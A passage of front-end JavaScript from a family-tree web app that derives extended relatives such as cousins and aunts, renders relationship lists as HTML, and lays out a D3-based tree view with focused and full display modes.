                const type = rel.type || rel.relationship_type;
                if (type !== 'SIBLING_OF') continue;
                const fromId = rel.from?.id || rel.from_person_id;
                const toId = rel.to?.id || rel.to_person_id;
                if (fromId === personId && toId != null) siblings.add(toId);
                else if (toId === personId && fromId != null) siblings.add(fromId);
            }

            // Aunts & uncles: siblings of my parents, plus their spouses.
            const auntsUncles = new Set();
            for (const parentId of parents) {
                // Sibling of parent via shared grandparents.
                for (const gpId of (parentsOf.get(parentId) || [])) {
                    for (const auId of (childrenOf.get(gpId) || [])) {
                        if (auId === parentId) continue;
                        auntsUncles.add(auId);
                        for (const sp of (spousesOf.get(auId) || [])) auntsUncles.add(sp);
                    }
                }
                // Also honor direct SIBLING_OF between parent + aunt/uncle.
                for (const rel of relationships) {
                    const type = rel.type || rel.relationship_type;
                    if (type !== 'SIBLING_OF') continue;
                    const fromId = rel.from?.id || rel.from_person_id;
                    const toId = rel.to?.id || rel.to_person_id;
                    let auId = null;
                    if (fromId === parentId) auId = toId;
                    else if (toId === parentId) auId = fromId;
                    if (auId != null && auId !== personId) {
                        auntsUncles.add(auId);
                        for (const sp of (spousesOf.get(auId) || [])) auntsUncles.add(sp);
                    }
                }
            }

            // Nieces & nephews: children of my siblings + children of my
            // spouse's siblings (step-niece/nephew).
            const niecesNephews = new Set();
            const sibsAndInLaws = new Set(siblings);
            for (const spId of spouses) {
                // Siblings of my spouse via their shared parents.
                const spParents = parentsOf.get(spId) || new Set();
                for (const spParentId of spParents) {
                    for (const kidId of (childrenOf.get(spParentId) || [])) {
                        if (kidId !== spId) sibsAndInLaws.add(kidId);
                    }
                }
            }
            for (const sibId of sibsAndInLaws) {
                for (const nnId of (childrenOf.get(sibId) || [])) niecesNephews.add(nnId);
            }

            // Cousins: children of my parents' siblings (children of my
            // aunts/uncles by blood — spouses' children fall in here too
            // if they share a graph relationship).
            const cousins = new Set();
            for (const auId of auntsUncles) {
                for (const cousId of (childrenOf.get(auId) || [])) cousins.add(cousId);
            }

            // Never include self in any derived bucket.
            for (const s of [grandparents, grandchildren, auntsUncles, niecesNephews, cousins]) {
                s.delete(personId);
            }

            // Materialize as {person, relationshipId} arrays for the
            // existing render pipeline. relationshipId is null for
            // derived buckets — the render bucket helper hides the
            // Remove button when null (Chunk C: users edit the source
            // chain to change these; can't "remove" a derived relation).
            const toRows = (idSet) => [...idSet]
                .map(id => personById.get(id))
                .filter(Boolean)
                .map(person => ({ person, relationshipId: null }));

            return {
                grandparents: toRows(grandparents),
                grandchildren: toRows(grandchildren),
                auntsUncles: toRows(auntsUncles),
                niecesNephews: toRows(niecesNephews),
                cousins: toRows(cousins),
            };
        }

        async function renderPersonRelationships(personId) {
            const container = document.getElementById('person-relationships');
            if (!container) return;

            // Get all persons and relationships from the tree
            const persons = appState.treeData?.persons || [];
            const relationships = appState.treeData?.relationships || [];

            // Find relationships for this person
            const parents = [];
            const children = [];
            const spouses = [];
            const siblings = [];

            // Track direct-edge dedup for SPOUSE_OF + SIBLING_OF (both
            // symmetric — the backend auto-mirrors so both directions
            // are present per pair). Extended types (grandparent /
            // grandchild / aunt-uncle / niece-nephew / cousin) come
            // from the derived helper below, not from direct edges.
            const addedSpouseIds = new Set();
            const addedSiblingIds = new Set();

            relationships.forEach(rel => {
                const fromId = rel.from?.id || rel.from_person_id;
                const toId = rel.to?.id || rel.to_person_id;
                const relType = rel.type || rel.relationship_type;

                const fromPerson = persons.find(p => p.id === fromId);
                const toPerson = persons.find(p => p.id === toId);

                if (fromId === personId) {
                    if (relType === 'CHILD_OF') {
                        parents.push({ person: toPerson, relationshipId: rel.id });
                    } else if (relType === 'SPOUSE_OF' && !addedSpouseIds.has(toId)) {
                        spouses.push({ person: toPerson, relationshipId: rel.id });
                        addedSpouseIds.add(toId);
                    } else if (relType === 'SIBLING_OF' && !addedSiblingIds.has(toId)) {
                        siblings.push({ person: toPerson, relationshipId: rel.id });
                        addedSiblingIds.add(toId);
                    }
                } else if (toId === personId) {
                    if (relType === 'CHILD_OF') {
                        children.push({ person: fromPerson, relationshipId: rel.id });
                    } else if (relType === 'SPOUSE_OF' && !addedSpouseIds.has(fromId)) {
                        spouses.push({ person: fromPerson, relationshipId: rel.id });
                        addedSpouseIds.add(fromId);
                    } else if (relType === 'SIBLING_OF' && !addedSiblingIds.has(fromId)) {
                        siblings.push({ person: fromPerson, relationshipId: rel.id });
                        addedSiblingIds.add(fromId);
                    }
                }
            });

            // Derived extended-type buckets from CHILD_OF+SPOUSE_OF chains.
            const derived = _computeDerivedRelationships(personId, persons, relationships);
            const cousins = derived.cousins;
            const auntsUncles = derived.auntsUncles;
            const niecesNephews = derived.niecesNephews;
            const grandparents = derived.grandparents;
            const grandchildren = derived.grandchildren;

            // Render relationship sections
            let html = '';

            if (parents.length > 0) {
                html += '<div class="mb-4"><h4 class="font-semibold text-gray-700 mb-2">Parents</h4><div class="space-y-2">';
                parents.forEach(({ person, relationshipId }) => {
                    const personName = `${escapeHtml(person.first_name)} ${escapeHtml(person.last_name)}`.trim();
                    html += `
                        <div class="flex items-center justify-between p-3 bg-blue-50 rounded-lg">
                            <button onclick="navigateToView('person-detail-view', {person: ${JSON.stringify(person).replace(/"/g, '&quot;')}})" class="text-primary hover:underline font-medium">
                                ${personName}
                            </button>
                            <button onclick="deleteRelationship('${relationshipId}', '${personName}', 'this person', 'CHILD_OF')" class="text-red-600 hover:text-red-800 text-sm">Remove</button>
                        </div>
                    `;
                });
                html += '</div></div>';
            }

            if (spouses.length > 0) {
                html += '<div class="mb-4"><h4 class="font-semibold text-gray-700 mb-2">Spouses</h4><div class="space-y-2">';
                spouses.forEach(({ person, relationshipId }) => {
                    const personName = `${escapeHtml(person.first_name)} ${escapeHtml(person.last_name)}`.trim();
                    html += `
                        <div class="flex items-center justify-between p-3 bg-pink-50 rounded-lg">
                            <button onclick="navigateToView('person-detail-view', {person: ${JSON.stringify(person).replace(/"/g, '&quot;')}})" class="text-primary hover:underline font-medium">
                                ${personName}
                            </button>
                            <button onclick="deleteRelationship('${relationshipId}', '${personName}', 'this person', 'SPOUSE_OF')" class="text-red-600 hover:text-red-800 text-sm">Remove</button>
                        </div>
                    `;
                });
                html += '</div></div>';
            }

            if (children.length > 0) {
                html += '<div class="mb-4"><h4 class="font-semibold text-gray-700 mb-2">Children</h4><div class="space-y-2">';
                children.forEach(({ person, relationshipId }) => {
                    const personName = `${escapeHtml(person.first_name)} ${escapeHtml(person.last_name)}`.trim();
                    html += `
                        <div class="flex items-center justify-between p-3 bg-green-50 rounded-lg">
                            <button onclick="navigateToView('person-detail-view', {person: ${JSON.stringify(person).replace(/"/g, '&quot;')}})" class="text-primary hover:underline font-medium">
                                ${personName}
                            </button>
                            <button onclick="deleteRelationship('${relationshipId}', '${personName}', 'this person', 'CHILD_OF')" class="text-red-600 hover:text-red-800 text-sm">Remove</button>
                        </div>
                    `;
                });
                html += '</div></div>';
            }

            if (siblings.length > 0) {
                html += '<div class="mb-4"><h4 class="font-semibold text-gray-700 mb-2">Siblings</h4><div class="space-y-2">';
                siblings.forEach(({ person, relationshipId }) => {
                    const personName = `${escapeHtml(person.first_name)} ${escapeHtml(person.last_name)}`.trim();
                    html += `
                        <div class="flex items-center justify-between p-3 bg-yellow-50 rounded-lg">
                            <button onclick="navigateToView('person-detail-view', {person: ${JSON.stringify(person).replace(/"/g, '&quot;')}})" class="text-primary hover:underline font-medium">
                                ${personName}
                            </button>
                            <button onclick="deleteRelationship('${relationshipId}', '${personName}', 'this person', 'SIBLING_OF')" class="text-red-600 hover:text-red-800 text-sm">Remove</button>
                        </div>
                    `;
                });
                html += '</div></div>';
            }

            // Derived-type buckets. Chunk B (2026-07-23): these come from
            // _computeDerivedRelationships walking CHILD_OF+SPOUSE_OF
            // chains, not from direct edges. relationshipId is null for
            // derived rows; the Remove button becomes an inline hint
            // pointing at the source chain (edit parents/siblings to
            // change these) since there's no single edge to remove.
            const renderBucket = (title, bucket, bgClass) => {
                if (bucket.length === 0) return;
                html += `<div class="mb-4"><h4 class="font-semibold text-gray-700 mb-2">${title}</h4><div class="space-y-2">`;
                bucket.forEach(({ person, relationshipId }) => {
                    const personName = `${escapeHtml(person.first_name)} ${escapeHtml(person.last_name)}`.trim();
                    const removeMarkup = relationshipId
                        ? `<button onclick="deleteRelationship('${relationshipId}', '${personName}', 'this person', '')" class="text-red-600 hover:text-red-800 text-sm">Remove</button>`
                        : `<span class="text-xs text-gray-400" title="Derived from parent/spouse chain — edit those to change this relationship.">Derived</span>`;
                    html += `
                        <div class="flex items-center justify-between p-3 ${bgClass} rounded-lg">
                            <button onclick="navigateToView('person-detail-view', {person: ${JSON.stringify(person).replace(/"/g, '&quot;')}})" class="text-primary hover:underline font-medium">
                                ${personName}
                            </button>
                            ${removeMarkup}
                        </div>
                    `;
                });
                html += '</div></div>';
            };
            renderBucket('Cousins', cousins, 'bg-purple-50');
            renderBucket('Aunts & Uncles', auntsUncles, 'bg-indigo-50');
            renderBucket('Nieces & Nephews', niecesNephews, 'bg-indigo-50');
            renderBucket('Grandparents', grandparents, 'bg-amber-50');
            renderBucket('Grandchildren', grandchildren, 'bg-amber-50');

            if (html === '') {
                html = '<p class="text-gray-500">No relationships found. Click "Add Relationship" to connect this person to family members.</p>';
            }

            container.innerHTML = html;
        }

        // Store tree zoom behavior globally
        let treeZoomBehavior = null;
        let treeSvg = null;

        // First-render measurement race guard (layer 1). The initial
        // Focused render after a page load can measure the scroll-clip
        // BEFORE layout has settled — fonts still loading, iOS URL bar
        // still resolving dvh, saved-tab visibility flip mid-frame — so
        // the tree gets sized against transitional dimensions and the
        // ResizeObserver never fires because the container never
        // "changes" again after the wrong measurement. Fix: defer the
        // FIRST render call inside document.fonts.ready + double-RAF so
        // measurements happen against settled layout. Subsequent renders
        // run synchronously (mode switches, tree switches, data
        // refreshes) — the race only exists on the initial page load.
        let _ftvFirstRenderPending = true;

        // Session 2a: D3 is now bundled via services/ftv-d3.js and lazy-
        // loaded on first FTV render. Was previously a <script src="https:
        // //d3js.org/d3.v7.min.js"> global. Vite auto-splits the import()
        // into its own chunk so boot doesn't pay for D3 unless the user
        // navigates to the tree view.
        let d3 = null;

        function renderFamilyTree(persons, relationships) {
            if (_ftvFirstRenderPending) {
                _ftvFirstRenderPending = false;
                const _deferredRender = () => renderFamilyTree(persons, relationships);
                Promise.resolve()
                    .then(() => document.fonts && document.fonts.ready)
                    .catch(() => {})
                    // Lazy-load D3 during the same first-render defer as fonts.
                    // Assigns to module-scoped `d3` so subsequent sync calls
                    // within this render + all future renders find it ready.
                    .then(() => import('./services/ftv-d3.js'))
                    .then(mod => { d3 = mod; })
                    .catch(err => { console.error('[FTV] D3 lazy-load failed:', err); })
                    .then(() => {
                        requestAnimationFrame(() => {
                            requestAnimationFrame(_deferredRender);
                        });
                    });
                return;
            }
            // Race guard: if renderFamilyTree is called concurrently while
            // the first defer's D3 load is still in-flight, `d3` may still
            // be null. Re-arm and defer this call too.
            if (!d3) {
                _ftvFirstRenderPending = true;
                return renderFamilyTree(persons, relationships);
            }
            const svg = d3.select("#tree-display");
            svg.selectAll("*").remove();
            treeSvg = svg;

            // Phase 2 amendment: viewer's claimed Person id (used by both
            // role-label perspective AND focus-mode anchor). Resolved up
            // front so both downstream blocks see the same value.
            const totalPersons = persons.length;
            const viewerRec = persons.find(p =>
                p.represented_by_user_id != null
                && String(p.represented_by_user_id) === String(appState.currentUserNeo4jId)
            );
            const viewerPersonIdEarly = viewerRec ? viewerRec.id : null;

            // Publish the viewer's Person id early so any early-return
            // renderFtvChrome() call (empty state, no-persons path) reads
            // the correct value. Previously this was set deep in the render
            // code, and the empty-state early return exited before it,
            // leaving the chrome to read a stale/null value → the Focused
            // toggle showed as disabled/not-highlighted on the solo case.
            appState._ftvViewerPersonId = viewerPersonIdEarly;

            // Phase 2 amendment: apply Focused-mode filter before D3 sees the
            // graph. Default 'focused' for users with a claimed Person;
            // 'full' for users without one (toggle disabled in chrome too).
            const savedFocus = loadFtvFocusMode(appState.currentTreeId);
            const effectiveFocus = savedFocus != null
                ? savedFocus
                : (viewerPersonIdEarly != null ? 'focused' : 'full');
            appState.ftvFocusMode = effectiveFocus;
            // Apply the mode class BEFORE any measurement. setFtvFocusMode
            // already applied it via _applyFtvModeClass + rAF, so on that
            // path this is a no-op idempotent write. On non-setFtvFocusMode
            // entry points (initial load, tree switch, data refresh) this
            // is where the class first gets set — measurements below run
            // in the same frame, but the caller path either just landed
            // from mount (already committed layout) or is coming from
            // loadFamilyTreeData (async gap since last paint) so there's
            // no stale-class race.
            _applyFtvModeClass(effectiveFocus);

            // Empty-state handling: viewer has a claimed Person but ZERO
            // edges in the whole graph. Render the empty state card +
            // suppress D3 entirely.
            const viewerHasAnyEdge = viewerPersonIdEarly != null && relationships.some(rel => {
                const fromId = rel.from && rel.from.id;
                const toId = rel.to && rel.to.id;
                return fromId === viewerPersonIdEarly || toId === viewerPersonIdEarly;
            });
            const emptyStateEl = document.getElementById('ebw-ftv-empty-state');
            const focusHintEl = document.getElementById('ebw-ftv-focus-hint');
            // T9 — Solo viewer: no relationships at all. Show the empty-state
            // card in BOTH modes. Previously only Focused mode caught this;
            // in Full mode the solo viewer would render as a lone floater
            // card under an "Unconnected" band, which reads worse than the
            // explicit CTA.
            //
            // T9 amendment — differentiate two sub-cases with context-aware
            // copy:
            //   (a) Tree has only the viewer (fresh solo tree). Keep the
            //       "Your family awaits" copy — nothing else to welcome them
            //       into yet.
            //   (b) Tree has other Persons but the viewer has no edges
            //       (invited-and-joined but hasn't linked to anyone). Welcome
            //       them by the tree's family name so the header + body stop
            //       contradicting each other (header says "The X Family",
            //       body should acknowledge that context).
            if (viewerPersonIdEarly != null && !viewerHasAnyEdge) {
                if (emptyStateEl) {
                    const heading = emptyStateEl.querySelector('.ebw-ftv-empty-heading');
                    const body = emptyStateEl.querySelector('.ebw-ftv-empty-body');
                    const hasOtherPersons = persons.length > 1;
                    if (hasOtherPersons) {
                        const rawName = (appState.currentTree?.name || 'family').trim();
                        // Tree names like "The Olaniyan Family" become
                        // "Welcome to the Olaniyan Family" — drop the leading
                        // "The " to avoid "Welcome to the The Olaniyan
                        // Family."
                        const familyName = rawName.replace(/^The\s+/i, '');
                        if (heading) heading.textContent = `Welcome to the ${familyName}`;
                        if (body) body.textContent = "You haven't connected to anyone yet. Add your first relationship to see your place in the family.";
                    } else {
                        if (heading) heading.textContent = 'Your family awaits';
                        if (body) body.textContent = 'Add your first connection to see your family grow.';
                    }
                    emptyStateEl.style.display = 'block';
                }
                if (focusHintEl) focusHintEl.style.display = 'none';
                // Reset SVG dimensions to match the current container.
                // Uses dynamic viewBox height (keeping design width at
                // 1000) so the SVG box fills the canvas fully — no
                // dead white/beige strip below the SVG for the empty-
                // state card to center against. height:100% works
                // because the flex-column canvas + flex:1 scroll-clip
                // (in main.css) give scroll-clip a definite height.
                const _esClip = document.getElementById('ebw-ftv-scroll-clip');
                const _esContainerW = (_esClip && _esClip.clientWidth) || 1000;
                const _esContainerH = (_esClip && _esClip.clientHeight) || 480;
                const _esViewBoxH = _esContainerW > 0
                    ? Math.round(1000 * _esContainerH / _esContainerW)
                    : 480;
                // Reset Full-mode chrome so the arrows/fades don't linger
                // (Full-mode class already removed by _applyFtvModeClass
                // at renderFamilyTree's top — this branch runs under
                // Focused-mode CSS regime.)
                svg.attr("width", 1000)
                   .attr("height", _esViewBoxH)
                   .attr("viewBox", `0 0 1000 ${_esViewBoxH}`)
                   .style("width", "100%")
                   .style("height", "100%");
                // Arm the ResizeObserver so the viewBox tracks the
                // container across rotation/resize — otherwise a stale
                // viewBox from initial render creates letterbox on
                // rotation (aspect changes but viewBox doesn't).
                _wireFtvResizeObserver();
                try { renderFtvChrome(); } catch (e) { /* noop */ }
                return;
            }
            if (emptyStateEl) emptyStateEl.style.display = 'none';

            // Apply the focus filter to both persons and relationships when
            // mode is 'focused' AND we have a viewer anchor. Full mode
            // passes data through unchanged.
            if (effectiveFocus === 'focused' && viewerPersonIdEarly != null) {
                const { personIds, edges } = filterToFocusedNeighborhood(
                    persons, relationships, viewerPersonIdEarly, FOCUSED_DEPTH
                );
                persons = persons.filter(p => personIds.has(p.id));
                relationships = edges;
            }

            // Footer hint visibility. Shown in BOTH modes so users can
            // discover the alternate view either direction:
            // - Focused: "Showing N of M people · Switch to Full tree"
            // - Full:    "Showing all N people · Switch to Focused view"
            //   (only when a claimed Person exists — otherwise Focused
            //   is not an available mode).
            if (focusHintEl) {
                if (effectiveFocus === 'focused' && persons.length < totalPersons) {
                    focusHintEl.style.display = 'block';
                    focusHintEl.innerHTML = `Showing ${persons.length} of ${totalPersons} people<button class="link" onclick="setFtvFocusMode('full')">Switch to Full tree</button>`;
                } else if (effectiveFocus === 'full' && viewerPersonIdEarly != null && totalPersons > 1) {
                    focusHintEl.style.display = 'block';
                    focusHintEl.innerHTML = `Showing all ${totalPersons} people<button class="link" onclick="setFtvFocusMode('focused')">Switch to Focused view</button>`;
                } else {
                    focusHintEl.style.display = 'none';
                }
            }

            // === Phase 2.5 T1: hierarchical layout via d3-hierarchy ===
            // Marriage lines are NOT part of the hierarchy. They come in the
            // T3 render pass — a separate horizontal marriage-line overlay
            // drawn after all subtrees are positioned. In T1 (this pass),
            // spouses render as separate subtree roots if they have no
            // in-tree parent; the marriage overlay in T3 draws the connecting
            // edge.
            //
            // No synthetic super-root. Each connected component in the
            // CHILD_OF graph becomes its own d3.tree() invocation. Subtrees
            // are laid out side-by-side left-to-right (T14) with an 80px
            // horizontal gap. Within each subtree, y is post-processed to
            // honor `generation_depth` (T15) so all persons of the same
            // generation depth land on the same horizontal band regardless
            // of how deep they are in the tree structure.

            // === Phase 2.5 T7: unconnected floaters ===
            // A floater is a person with ZERO relationship edges (CHILD_OF /
            // SPOUSE_OF / SIBLING_OF / any type) — they've been added to the
            // tree but haven't been linked to anyone yet. Under T1 they'd
            // fall out as single-node components mixed in with the main tree
            // subtrees. T7 pulls them out of the main layout and places them
            // in a dedicated "Unconnected" band ABOVE the main tree in Full
            // mode. Focused mode filters them out by construction (they
            // can't be within depth 2 of the viewer).
            const hasAnyEdgeSet = new Set();
            relationships.forEach(rel => {
                const fromId = rel.from && rel.from.id;
                const toId = rel.to && rel.to.id;
                if (fromId != null) hasAnyEdgeSet.add(fromId);
                if (toId != null) hasAnyEdgeSet.add(toId);
            });
            const floaterPersons = persons.filter(p => !hasAnyEdgeSet.has(p.id));
            const mainPersons = persons.filter(p => hasAnyEdgeSet.has(p.id));

            const showFloaterBand = effectiveFocus !== 'focused' && floaterPersons.length > 0;

            const components = buildParentChildComponents(mainPersons, relationships);
            if (components.length === 0 && !showFloaterBand) {
                // Truly empty tree (no persons at all after filtering). Show
                // the empty-state card treatment so the FTV chrome + toggle
                // update consistently. Same reset dance as the T9 branch so
                // Full-mode scroll chrome doesn't linger.
                if (emptyStateEl) emptyStateEl.style.display = 'block';
                if (focusHintEl) focusHintEl.style.display = 'none';
                // (Full-mode class already removed by _applyFtvModeClass
                // at renderFamilyTree's top — clip.clientHeight reflects
                // the flex-stretched height by the time we read it.)
                // Dynamic viewBox height mirroring the T9 branch above —
                // SVG fills the canvas fully, no dead strip.
                const _emptyClip = document.getElementById('ebw-ftv-scroll-clip');
                const _emptyContainerW = (_emptyClip && _emptyClip.clientWidth) || 1000;
                const _emptyContainerH = (_emptyClip && _emptyClip.clientHeight) || 480;
                const _emptyViewBoxH = _emptyContainerW > 0
                    ? Math.round(1000 * _emptyContainerH / _emptyContainerW)
                    : 480;
                svg.attr("width", 1000)
                   .attr("height", _emptyViewBoxH)
                   .attr("viewBox", `0 0 1000 ${_emptyViewBoxH}`)
                   .style("width", "100%")
                   .style("height", "100%");
                _wireFtvResizeObserver();
                try { renderFtvChrome(); } catch (e) { /* noop */ }
                return;
            }

            const width = 1400;
            const height = 1000;
            const margin = { top: 80, right: 120, bottom: 50, left: 250 };
            const nodeW = 200;
            const nodeH = 160;
            // T14: ~80px horizontal gap between adjacent subtrees (measured
            // edge-to-edge). Cards are 150 wide, so subtreeGapX between
            // center-ranges = 150 + 80 = 230. Guarantees no card overlap
            // even for single-node subtrees while giving clear visual
            // separation between disconnected lineages.
            const subtreeGapX = 230;

            svg.attr("viewBox", `0 0 ${width} ${height}`)
               .attr("preserveAspectRatio", "xMidYMid meet")
               .style("width", "100%")
               .style("height", "auto");

            const layoutTree = d3.tree().nodeSize([nodeW, nodeH]);

            // T15: resolve generation depth per person. Uses the backend
            // Phase 0 field when present for enough of the tree; otherwise
            // BFS from the viewer's Person. Guarantees every person has a
            // non-negative depth even if Phase 0 migration missed them.
            const genDepthOf = computeGenerationDepthMap(persons, relationships, viewerPersonIdEarly);

            // Layout each subtree, offset in x, then override y with
            // generation_depth. Assemble into a single flat `allNodes` list
            // that downstream code iterates against — mirrors the shape of
            // the pre-T1 `root.descendants()` array (each entry has .data,
            // .x, .y, .depth).
            const allNodes = [];
            // Preserve each subtree's d3.hierarchy root for the ancestor
            // re-center pass below (added 2026-07-23). Post-order walks
            // need the hier structure; allNodes alone loses parent-child
            // linkage since it's a flat descendant array.
            const hierRoots = [];
            let currentXOffset = 0;
            components.forEach(comp => {
                const hier = d3.hierarchy(comp.root);
                layoutTree(hier);

                let minX = Infinity, maxX = -Infinity;
                hier.each(n => {
                    if (n.x < minX) minX = n.x;
                    if (n.x > maxX) maxX = n.x;
                });
                const shift = currentXOffset - minX;
                hier.each(n => { n.x += shift; });
                currentXOffset = (maxX - minX) + shift + subtreeGapX;

                // Post-process y using generation_depth. Falls back to the
                // tree's own depth (root=0, child=1, ...) when the field is
                // missing — should be rare after Phase 0's migration.
                hier.each(n => {
                    const gen = genDepthOf.get(n.data.id);
                    n.y = ((Number.isFinite(gen) ? gen : n.depth)) * nodeH;
                });

                hier.descendants().forEach(d => allNodes.push(d));
                hierRoots.push(hier);
            });

            // T7 — floater band. Sits one nodeH above the topmost main-tree
            // row so there's a clear visual separation. In Focused mode we
            // don't get here (showFloaterBand is false), and the divider is
            // suppressed.
            let floaterBandY = null;
            let floaterBandBounds = null;
            if (showFloaterBand) {
                let mainMinY = Infinity;
                let mainMinX = Infinity, mainMaxX = -Infinity;
                allNodes.forEach(n => {
                    if (n.y < mainMinY) mainMinY = n.y;
                    if (n.x < mainMinX) mainMinX = n.x;
                    if (n.x > mainMaxX) mainMaxX = n.x;
                });
                if (allNodes.length === 0) {
                    mainMinY = 0;
                    mainMinX = 0;
                    mainMaxX = 0;
                }
                floaterBandY = mainMinY - nodeH;
                const mainMidX = (mainMinX + mainMaxX) / 2;
                const floaterSpacing = nodeW;
                const bandWidth = (floaterPersons.length - 1) * floaterSpacing;
                const bandStartX = mainMidX - bandWidth / 2;

                floaterPersons.forEach((p, i) => {
                    const fx = bandStartX + i * floaterSpacing;
                    allNodes.push({
                        data: p,
                        x: fx,
                        y: floaterBandY,
                        depth: 0,
                    });
                });

                floaterBandBounds = {
                    minX: bandStartX - 100,
                    maxX: bandStartX + bandWidth + 100,
                    y: floaterBandY,
                    dividerY: (floaterBandY + mainMinY) / 2,
                };
            }

            // Create a fixed group for generation markers (not affected by zoom)
            const fixedGroup = svg.append("g")
                .attr("class", "fixed-elements")
                .attr("transform", `translate(0, 0)`);

            const g = svg.append("g").attr("class", "ftv-content-group").attr("transform", `translate(${margin.left},${margin.top})`);

            // Store generation levels for updating badge positions during zoom
            let storedGenerationLevels = null;

            // T11 + touch-Full extension: pan/zoom mode by (mode, device).
            //   Focused (any device): d3.zoom is sole transform owner.
            //   Full + desktop:       offsetX g.transform + T6 scroll bands
            //                         + _recenterFtvInFull ResizeObserver.
            //   Full + touch:         d3.zoom sole owner, initial fit-to-
            //                         width, no scroll bands, no offsetX.
            // Setup for Focused fires here; touch-Full defers to post-
            // layout (see the effectiveFocus !== 'focused' block below)
            // because fit-to-width needs the computed tree bounds.
            //
            // Gesture rules shared across both zoom-owner modes:
            //   - Multi-touch (>=2 fingers): always route to d3.zoom
            //     (pinch scale + two-finger pan).
            //   - Single-touch:
            //       - At or below fitK * 1.1: fall through to page scroll
            //         so a single-finger vertical swipe scrolls the page.
            //       - Above fitK * 1.1 (user has zoomed in): route to
            //         d3.zoom so single-finger pan works on the zoomed
            //         tree — no need to keep two fingers on the screen
            //         to move around when everything's magnified.
            //   - Mouse: unchanged default (no ctrl / not right-click).
            // _ftvCurrentFitK is refreshed on each initial-transform apply
            // (setup + refit-on-resize) so the threshold tracks the
            // current fit, not a stale one after rotation.
            const _zoomFilter = event => {
                if (event.type === 'touchstart' || event.type === 'touchmove') {
                    if (event.touches && event.touches.length >= 2) return true;
                    if (_ftvCurrentFitK == null) return false;
                    const svgNode = document.getElementById('tree-display');
                    if (!svgNode) return false;
                    const t = d3.zoomTransform(svgNode);
                    return t.k > _ftvCurrentFitK * 1.1;
                }
                return !event.ctrlKey && !event.button;
            };

            if (effectiveFocus === 'focused') {
                // Dynamic viewBox height. Uses the SAME design width
                // constant the layout math is calibrated to (width =
                // 1400) so viewBox aspect matches container aspect
                // exactly — no horizontal letterbox inside the SVG.
                // Prior version used 1000 for the aspect calc but 1400
                // for the viewBox attribute, creating a persistent
                // ~29% vertical letterbox on portrait mobile.
                const _focCentEl = document.getElementById('ebw-ftv-scroll-clip');
                const _focContainerW = (_focCentEl && _focCentEl.clientWidth) || width;
                const _focContainerH = (_focCentEl && _focCentEl.clientHeight) || height;
                const _focViewBoxH = _focContainerW > 0
                    ? Math.round(width * _focContainerH / _focContainerW)
                    : height;
                // Zoom behavior — translateExtent + initial transform
                // are set to bare/generous placeholders here and get
                // REPLACED after layout below (see the "Focused
                // content-bounds fit" block near allNodes). Setting
                // them here avoids d3 warnings about missing extents
                // while nodes are being drawn.
                const focPad = 600;
                treeZoomBehavior = d3.zoom()
                    .filter(_zoomFilter)
                    .scaleExtent([0.4, 2.5])
                    .translateExtent([[-focPad - width, -focPad], [width * 2 + focPad, _focViewBoxH + focPad]])
                    .on("zoom", (event) => {
                        g.attr("transform", event.transform);
                        if (storedGenerationLevels) {
                            updateGenerationBadgePositions(event.transform, storedGenerationLevels);
                        }
                    });
                svg.call(treeZoomBehavior);
                svg.on('dblclick.zoom', null);
                // Placeholder initial transform. Real fit-and-center
                // runs after layout when allNodes carries positions.
                svg.call(treeZoomBehavior.transform, d3.zoomIdentity);
                // Placeholder fitK — overwritten by the post-layout
                // block. The single-finger-pan filter (k > fitK * 1.1)
                // reads the current value; wiring stays intact.
                _ftvCurrentFitK = 0.9;
                _ftvFocusedGeom = { viewBoxH: _focViewBoxH, focPad, initialK: 0.9, marginTop: margin.top };
            } else {
                // Full mode: defer transform setup to after layout so we
                // know actual bounds. Reset any previous state.
                treeZoomBehavior = null;
                g.attr("transform", null);
                _ftvTouchFullInitialTransform = null;
                _ftvTouchFullBounds = null;
                _ftvCurrentFitK = null;
            }

            // === Phase 2.5 T4: polygamous cluster repositioning ===
            // A polygamous head is a person with 2+ SPOUSE_OF edges. After
            // the T1 layout, each spouse landed in her own subtree slot
            // side-by-side. T4 repositions each spouse (and everything below
            // her in her own subtree) so the head stays centered and the
            // spouses flank symmetrically at the same y. Under our earlier
            // primary-parent fix, each mother's children already cluster
            // under her subtree — so moving her by delta moves the whole
            // union with her.
            //
            // No "primary spouse" per the brief. Spouses are sorted by their
            // current x (which is the layout's natural order) and split
            // evenly across the head. Odd counts get the extra card on the
            // right side. Stride ≈ nodeW so cards don't overlap the head.
            const nodeById = new Map();
            allNodes.forEach(n => nodeById.set(n.data.id, n));
            const stride = 220;

            const headSpouses = new Map();
            const t4SpousePairsSeen = new Set();
            relationships.forEach(rel => {
                if (rel.type !== 'SPOUSE_OF') return;
                const aId = rel.from && rel.from.id;
                const bId = rel.to && rel.to.id;
                if (aId == null || bId == null) return;
                const pairKey = [aId, bId].sort((x, y) => x - y).join('-');
                if (t4SpousePairsSeen.has(pairKey)) return;
                t4SpousePairsSeen.add(pairKey);
                if (!headSpouses.has(aId)) headSpouses.set(aId, new Set());
                if (!headSpouses.has(bId)) headSpouses.set(bId, new Set());
                headSpouses.get(aId).add(bId);
                headSpouses.get(bId).add(aId);
            });


            // Track everyone we've already repositioned so the monogamous
            // adjacency pass below doesn't double-move them.
            const repositionedForSpouse = new Set();

            // Order polygamous heads by generation (y) ascending so oldest
            // generation lands FIRST. If we processed a lower-generation
            // head before its parent's cluster, moving the parent's subtree
            // would displace the head after we placed his wives — breaking
            // symmetry. Top-down order guarantees each head's T4 fires on
            // its final position after any ancestor cluster has landed.
            const polyHeadOrder = [...headSpouses.entries()]
                .filter(([, set]) => set.size >= 2)
                .filter(([headId]) => nodeById.has(headId))
                .sort((a, b) => nodeById.get(a[0]).y - nodeById.get(b[0]).y);
            // Poly-head id set used later by the enforcement pass to skip
            // pairs where the intermediate is a T4-placed co-wife.
            const polyHeadIdsForEnforce = new Set(polyHeadOrder.map(([id]) => id));

            polyHeadOrder.forEach(([headId, spouseSet]) => {
                const head = nodeById.get(headId);
                if (!head) return;
                // Capture head's x BEFORE any moves. If the head is a
                // descendant of a spouse subtree (common: mother's subtree
                // contains father via primary-parent selection), moving that
                // subtree would displace the head — poisoning subsequent
                // target-x calculations. Fix: freeze headX, snapshot each
                // spouse's original x, and exclude the head from spouse
                // subtree moves.
                const headX = head.x;
                const spouses = [...spouseSet]
                    .map(id => nodeById.get(id))
                    .filter(n => n && Math.abs(n.y - head.y) <= 4);
                if (spouses.length === 0) return;
                spouses.sort((a, b) => a.x - b.x);

                const originalX = new Map();
                spouses.forEach(s => originalX.set(s.data.id, s.x));

                const N = spouses.length;
                const leftCount = Math.floor(N / 2);

                // Dynamic-stride placement: the k-th wife on a side sits at
